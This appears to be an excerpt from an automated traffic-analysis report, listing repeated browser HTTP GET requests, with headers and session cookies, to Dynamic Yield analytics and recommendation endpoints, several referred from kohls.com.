Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=441024&uid=5152118215960316765&sec=8776374&t=ri&e=1185440&p=1&ve=11002655&va=%5B27022616%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285337344252&cgtgDecisionId=6223531283899017054&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765458&rri=8757921 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=357547&uid=5152118215960316765&sec=8776374&t=ri&e=1289933&p=1&ve=11374557&va=%5B27236876%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531284342582131&cgtgDecisionId=6223531283855978855&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765460&rri=4823724 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=ur/+j0ZMmQ20/+c3+daSrLz3iKbrHTl7P8bMGs/2E1yfmrG1uCYydEEvWULW5Jwunibm1bYcaVkJrCDmDAk9EVOuQ/ioLVjWT2GsXoYOtobGa6+1eW/m0X3986Je; AWSALBCORS=ur/+j0ZMmQ20/+c3+daSrLz3iKbrHTl7P8bMGs/2E1yfmrG1uCYydEEvWULW5Jwunibm1bYcaVkJrCDmDAk9EVOuQ/ioLVjWT2GsXoYOtobGa6+1eW/m0X3986JeIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=329350&uid=5152118215960316765&sec=8776374&t=ri&e=1343143&p=1&ve=11836075&va=%5B27429945%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282356931978&cgtgDecisionId=6223531285009424051&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765463&rri=3022219 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /spa/json?sec=8776374&id=5152118215960316765&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&jsession=485f45289856e801061ea1736ab89d6f&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=571222&uid=5152118215960316765&sec=8776374&t=ri&e=1309946&p=1&ve=11951163&va=%5B27308034%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285093722672&cgtgDecisionId=6223531284983802992&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765461&rri=5613828 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=462545&uid=5152118215960316765&sec=8776374&t=ri&e=1718774&p=1&ve=13127278&va=%5B28710098%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282278432871&cgtgDecisionId=6223531281411508625&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765474&rri=2921186 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=695376&uid=5152118215960316765&sec=8776374&t=ri&e=1364209&p=1&ve=11678654&va=%5B27506569%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285013511387&cgtgDecisionId=6223531283753054186&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765465&rri=5583880 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=132130&uid=5152118215960316765&sec=8776374&t=ri&e=1800633&p=1&ve=13331508&va=%5B29002357%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282345478973&cgtgDecisionId=6223531285464528637&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765476&rri=3064575 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=87521&uid=5152118215960316765&sec=8776374&t=ri&e=1850311&p=1&ve=13485570&va=%5B29152080%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281209263875&cgtgDecisionId=6223531282350819874&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765477&rri=9518691 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=850126&uid=5152118215960316765&sec=8776374&t=ri&e=1430321&p=1&ve=13039857&va=%5B27737517%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531283553389137&cgtgDecisionId=6223531281455859128&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765466&rri=6335366 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=128850&uid=5152118215960316765&sec=8776374&t=ri&e=1494574&p=1&ve=12255008&va=%5B27939630%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281929211350&cgtgDecisionId=6223531282553591841&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765467&rri=4460154 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=352893&uid=5152118215960316765&sec=8776374&t=ri&e=1499924&p=1&ve=12255037&va=%5B27954911%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281611242527&cgtgDecisionId=6223531282400351928&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765469&rri=4314070 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=738572&uid=5152118215960316765&sec=8776374&t=ri&e=1654163&p=1&ve=12837615&va=%5B28481328%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282440805148&cgtgDecisionId=6223531285467312969&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765471&rri=1178035 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=208047&uid=5152118215960316765&sec=8776374&t=ri&e=1717934&p=1&ve=13127279&va=%5B28707585%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282585698845&cgtgDecisionId=6223531281764759573&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765472&rri=9086214 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /spa/json?sec=8776374&id=5152118215960316765&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&jsession=485f45289856e801061ea1736ab89d6f&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=dj742T3ZwvE7bGDvKGgvCFoL6BoAjar5D4OcUXeGFtoXmQX0rL0uLx61aFbZcu80WKCZ7QX/HavigdE82S3ZBvub2NZmfAl1L7/jpN9NMjMvRh93zoszqVmf+32B; AWSALBCORS=dj742T3ZwvE7bGDvKGgvCFoL6BoAjar5D4OcUXeGFtoXmQX0rL0uLx61aFbZcu80WKCZ7QX/HavigdE82S3ZBvub2NZmfAl1L7/jpN9NMjMvRh93zoszqVmf+32BIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=462545&uid=5152118215960316765&sec=8776374&t=ri&e=1718774&p=1&ve=13127278&va=%5B28710098%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282278432871&cgtgDecisionId=6223531281411508625&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765474&rri=2921186 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=132130&uid=5152118215960316765&sec=8776374&t=ri&e=1800633&p=1&ve=13331508&va=%5B29002357%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282345478973&cgtgDecisionId=6223531285464528637&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765476&rri=3064575 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=87521&uid=5152118215960316765&sec=8776374&t=ri&e=1850311&p=1&ve=13485570&va=%5B29152080%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281209263875&cgtgDecisionId=6223531282350819874&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765477&rri=9518691 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=iGkO5gbY/YuydvfA3uvvrJBrMDOEaLeBI/3U5ogI18L4CAGTMYDkdd2kwLs61CEH2TkhLZMzy7HwTgfiikpYHNkk4nByyJYgaj1Merc4BlF6D8KnCxnCjxPFZgok; AWSALBCORS=iGkO5gbY/YuydvfA3uvvrJBrMDOEaLeBI/3U5ogI18L4CAGTMYDkdd2kwLs61CEH2TkhLZMzy7HwTgfiikpYHNkk4nByyJYgaj1Merc4BlF6D8KnCxnCjxPFZgokIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=iGkO5gbY/YuydvfA3uvvrJBrMDOEaLeBI/3U5ogI18L4CAGTMYDkdd2kwLs61CEH2TkhLZMzy7HwTgfiikpYHNkk4nByyJYgaj1Merc4BlF6D8KnCxnCjxPFZgok; AWSALBCORS=iGkO5gbY/YuydvfA3uvvrJBrMDOEaLeBI/3U5ogI18L4CAGTMYDkdd2kwLs61CEH2TkhLZMzy7HwTgfiikpYHNkk4nByyJYgaj1Merc4BlF6D8KnCxnCjxPFZgokIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=zUcFR+sKJ+LDNf/9PT0GrXZFbE1/GY4IXuJvQa8uo1CqgYJTRVlO4+U1N8p0oeksV6Z+I5isW52ZkpvPf0kHq4F0tKu1QNQY1OrZHG3RgSMVIu8plCI5w9kaNTrI; AWSALBCORS=zUcFR+sKJ+LDNf/9PT0GrXZFbE1/GY4IXuJvQa8uo1CqgYJTRVlO4+U1N8p0oeksV6Z+I5isW52ZkpvPf0kHq4F0tKu1QNQY1OrZHG3RgSMVIu8plCI5w9kaNTrIIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f; AWSALB=CVoGwsku+dcoYJMAjyDSoxjMT3u4LSjofnjr80ghvnj9t5JtRu2Az/HD8Tl8iyPJKcqqk8QylFWNRwig82n5gRpFF/o8M7AcsdgiGvLnABybhvRopb8qv/dCp7Ex; AWSALBCORS=CVoGwsku+dcoYJMAjyDSoxjMT3u4LSjofnjr80ghvnj9t5JtRu2Az/HD8Tl8iyPJKcqqk8QylFWNRwig82n5gRpFF/o8M7AcsdgiGvLnABybhvRopb8qv/dCp7ExIf-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
